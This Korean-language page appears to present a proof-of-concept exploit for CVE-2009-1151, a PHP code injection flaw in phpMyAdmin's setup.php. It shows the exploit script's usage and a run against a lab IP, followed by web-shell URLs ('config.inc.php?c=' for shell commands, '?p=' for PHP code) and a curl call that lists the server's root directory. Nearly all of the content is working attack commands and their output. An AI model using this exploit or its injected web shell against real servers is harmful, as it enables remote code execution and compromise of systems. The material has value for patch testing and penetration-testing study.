
phpMyAdmin '/scripts/setup.php' PHP 코드 삽입 RCE PoC (CVE-2009-1151)
phpMyAdmin '/scripts/setup.php' PHP 코드 삽입 RCE POC. CVE-2009-1151에 대해 최초로 공개된 익스플로잇입니다.
$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] 제공된 URL에 phpMyAdmin이 존재하는지 확인 중 ...
[+] phpMyAdmin 쿠키 및 폼 토큰을 성공적으로 수신했습니다. 좋습니다!
[+] phpinfo() 주입 시도 중 ...
[+] 성공! phpinfo()가 성공적으로 주입되었습니다! 출력이 /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html에 저장되었습니다.
[+] 이제 브라우저를 사용하여 원격으로 셸 명령과 PHP 코드를 실행할 수 *있습니다*. 예:
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
이 스크립트에 대한 피드백이나 개선 사항은 unknown.pentester<AT_sign_goes_here>gmail.com으로 보내주세요.
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
_[간결성을 위해 일부 출력 생략]_